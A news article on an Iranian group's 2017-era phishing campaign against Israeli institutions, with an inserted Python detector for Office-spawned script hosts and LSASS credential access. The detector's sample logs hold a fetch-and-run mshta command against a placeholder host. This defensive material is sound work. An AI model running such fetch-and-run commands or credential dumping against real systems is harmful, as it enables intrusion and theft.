Iranian Hackers Believed Behind Massive Attacks on Israeli Targets

Published: 22/11/2024   Category: security


OilRig aka Helix Kitten nation-state group leveraged Microsoft zero-day bug in targeted attacks.



A massive targeted cyber espionage campaign against major Israeli institutions and government officials underscores just how far an Iranian nation-state hacking machine has come.
The Israeli Cyber Defense Authority yesterday announced that it believes Iran was behind a series of targeted attacks against some 250 individuals between April 19 and 24 in government agencies, high-tech companies, medical organizations, and educational institutions, including the renowned Ben-Gurion University. The attackers, whom security experts say are members of the so-called OilRig (aka Helix Kitten, aka NewsBeef) nation-state hacking group in Iran, used stolen email accounts from Ben-Gurion to send their payload to victims.
"This is the largest and most sophisticated attack they've [OilRig] ever performed," says Michael Gorelik, vice president of R&D for Morphisec, who studied the attacks and confirms that the final stage was thwarted for the most part. "It was a major information-gathering [operation]," he says.
OilRig has been rapidly maturing since it kicked off operations around 2015. The attack campaign against Israeli targets employed the just-patched Microsoft CVE-2017-0199 remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) application programming interface. This flaw had been weaponized in attacks prior to the patch, including Dridex banking Trojan and botnet attacks, and in at least one other cyber espionage campaign.
This technique by OilRig is a step up from the group's previous MO of using malicious macros to spread malware, where it employed Microsoft Excel and Word files that required the victim to enable macros to get infected. This time around, no macros were necessary: the files contained an exploit via an embedded link packed with an HTML executable, according to researchers at Israeli security firm Morphisec who studied the new attacks.
OilRig managed to catch the victims during the patching window between when Microsoft issues a security update and when organizations actually roll out the patch, security experts say. "The most important difference is that the use of macros was exchanged with a vulnerability exploit. With their ability to set up the attack in a relatively short time, the threat actors could correctly speculate that their window of opportunity between patch release and patch rollout was still open," according to Morphisec's
blog post
today.
The hacking group also was likely behind an attack campaign in January that employed a phony Juniper Networks VPN portal as well as phony websites purporting to be the University of Oxford, from which the attackers dropped malware.
Adam Meyers, vice president of intelligence at CrowdStrike, which has named this Iranian hacker group Helix Kitten, says the group has been advanced for some time. "There's this misconception that they weren't sophisticated before," he says. The group has been active since 2015 and has gone after aviation, energy, financial, and government targets in various regions and countries, including the United Arab Emirates, Turkey, and Qatar, he says.
OilRig/Helix Kitten was not the first attack group to weaponize the Microsoft CVE-2017-0199 remote code execution vulnerability before it was patched, he notes, pointing to attacks in Ukraine, China, and the US earlier this year. It's unusual to see multiple threat actors pick up a zero-day, he says, which could hint at an 0day broker selling it to multiple customers.
Meantime, Morphisec's Gorelik says in the latest round of attacks, OilRig employed a customized version of the open-source Mimikatz tool, which extracts user credentials from the Windows Local Security Authority Subsystem Service (LSASS).
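As an added defensive example, not code from the article or from Morphisec, here is a small Python detector over constructed Sysmon-style process telemetry that flags the two behaviours described above: an Office application launching a script host such as mshta.exe, the Windows component that runs HTML executables, and a process outside an allowlist opening LSASS, which is what a Mimikatz-style credential dump looks like from the endpoint. The log format, the field names, and the LSASS allowlist are assumptions made for this example.

```python
from typing import Dict, List, Optional

# Office applications whose documents were the delivery vehicle in the campaign
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts an Office document should not normally launch; mshta.exe is the
# host that runs HTML executables (.hta) such as the one linked from the OLE object
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Assumed allowlist of processes that legitimately open LSASS; tune per environment
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_line(line: str) -> Dict[str, str]:
    """Parse 'EventType|Key=Value|...' (constructed format, Sysmon-like field names)."""
    event, *fields = line.strip().split("|")
    record = {"event": event}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    return record

def check(record: Dict[str, str]) -> Optional[str]:
    """Return an alert string for one record, or None if it looks benign."""
    if record["event"] == "ProcessCreate":
        parent = basename(record.get("ParentImage", ""))
        child = basename(record.get("Image", ""))
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            return f"office-spawned-script-host: {parent} -> {child}"
    elif record["event"] == "ProcessAccess":
        source = basename(record.get("SourceImage", ""))
        if basename(record.get("TargetImage", "")) == "lsass.exe" and source not in LSASS_ALLOWED_SOURCES:
            return f"lsass-access: {source}"
    return None

def detect(lines: List[str]) -> List[str]:
    """Run every line through check() and collect the alerts in order."""
    return [alert for alert in (check(parse_line(ln)) for ln in lines) if alert]

# Constructed sample telemetry, not real logs from the campaign
SAMPLE_LOGS = [
    "ProcessCreate|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|CommandLine=WINWORD.EXE report.docx",
    "ProcessCreate|ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta.exe http://example.invalid/t.hta",
    "ProcessAccess|SourceImage=C:\\Windows\\System32\\csrss.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1FFFFF",
    "ProcessAccess|SourceImage=C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe|TargetImage=C:\\Windows\\System32\\lsass.exe|GrantedAccess=0x1010",
]

if __name__ == "__main__":
    print("\n".join(detect(SAMPLE_LOGS)))
```

In production the allowlist should be keyed on full signed image paths rather than file names, and the LSASS rule is usually narrowed further by the GrantedAccess mask.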
OilRig is among the ranks of nation-state gangs using open-source hacking tools. Kurt Baumgartner, principal security researcher for Kaspersky Lab's Global Research and Analysis Team, says OilRig, which Kaspersky calls NewsBeef, in the past year has relied heavily on open-source hacking tools, namely BeEF for exploiting holes in browsers; Unicorn for PowerShell-type attacks; and Pupy for planting a remote administration tool, or RAT. That's a far cry from its earlier days, when it relied on social engineering accounts to target victims. "NewsBeef is not well-resourced, so this enables them to up their game," he says.
Politics
Most of Iran's targets over the past few months have been in the Middle East, namely its nemesis Saudi Arabia, but this pivot to Israel should be a red flag to other nations embroiled in geopolitical conflict with Iran, such as the US, security experts say.
Tom Kellermann, CEO of Strategic Cyber Ventures, says the attacks indeed illustrate how Iran's nation-state hacking machine has evolved and advanced. He attributes this transformation to Russian advisors assisting Iranian hackers. Look for OilRig to go West soon, too, he says.
"OilRig will tendril West to the USA due to the Secretary of State and President's visceral statements on Iran over the past month. The Iranians are not alone, as the Russian Pawn Storm [nation-state hacking] campaign will dramatically ratchet up due to tensions with US and NATO per the Baltics and the French election," he says.
Their attacks also may be more destructive, including data-wiping: "To this point these actors will be more inclined to burn the evidence and house … [the] network via destructive counter-IR [incident response] integrity attacks, which could hamper IR efforts and investigations," he says. "I am concerned that watering-hole attacks will increase, delivering 0days and wiper malware."